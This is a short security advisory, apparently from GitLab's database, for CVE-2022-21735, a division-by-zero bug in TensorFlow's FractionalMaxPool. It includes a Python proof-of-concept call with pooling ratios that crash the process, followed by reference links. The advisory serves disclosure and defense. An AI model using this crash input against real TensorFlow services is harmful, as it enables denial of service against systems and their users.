CVE-2022-21735: Division by zero in Tensorflow
(updated )
The implementation of FractionalMaxPool
can be made to crash a TensorFlow process via a division by 0:
import tensorflow as tf
import numpy as np
tf.raw_ops.FractionalMaxPool(
value=tf.constant(value=[[[[1, 4, 2, 3]]]], dtype=tf.int64),
pooling_ratio=[1.0, 1.44, 1.73, 1.0],
pseudo_random=False,
overlapping=False,
deterministic=False,
seed=0,
seed2=0,
name=None)
References
- github.com/advisories/GHSA-87v6-crgm-2gfj
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2022-59.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2022-114.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/fractional_max_pool_op.cc
- github.com/tensorflow/tensorflow/commit/ba4e8ac4dc2991e350d5cc407f8598c8d4ee70fb
- github.com/tensorflow/tensorflow/security/advisories/GHSA-87v6-crgm-2gfj
- nvd.nist.gov/vuln/detail/CVE-2022-21735
Detect and mitigate CVE-2022-21735 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →